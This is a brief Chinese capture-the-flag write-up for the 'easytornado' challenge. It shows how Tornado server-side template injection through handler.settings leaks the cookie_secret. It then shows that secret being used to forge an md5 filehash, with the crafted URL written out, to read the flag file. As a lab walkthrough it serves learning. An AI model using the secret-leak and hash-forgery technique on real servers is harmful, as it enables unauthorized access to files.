easytornado

0x01

进入网站,发现3个文件

逐一查看
flag.txt
url:?filename=/flag.txt&filehash=d3f3ff3f92c98f5f0ff4b8c423e1c588

welcome.txt
url:?filename=/welcome.txt&filehash=5eb47a32caebeb0573e9c7b4855ed21d

hints.txt
url:filename=/hints.txt&filehash=c29ae3750aeaa92cc6ee247785c661e7

0x02 分析

url为?filename=文件名&filehash=hash值构成
而hash值由md5(cookie_secret+md5(filename))构成
已知flag在/fllllllllllllag中
那么只要知道cookie_secret,便得出flag

存在服务器模板注入

使用handler.settings对象得到 cookie_secret
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'd979c023-0408-4cfd-bbb3-adff7ab5e408'}

构造payload
cookie_secret:d979c023-0408-4cfd-bbb3-adff7ab5e408
md5(/fllllllllllllag):3bf9f6cf685a6dd8defadabfb41a03a1
md5(合并)
得到md5值:07d0fdc73eb7a22787adfe04f375bf2a
构造,得出flag
?filename=/fllllllllllllag&filehash=07d0fdc73eb7a22787adfe04f375bf2a

参考链接:
https://blog.csdn.net/zz_Caleb/article/details/101473013/
https://www.cnblogs.com/joker-vip/p/12511948.html

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/observering/p/12839826.html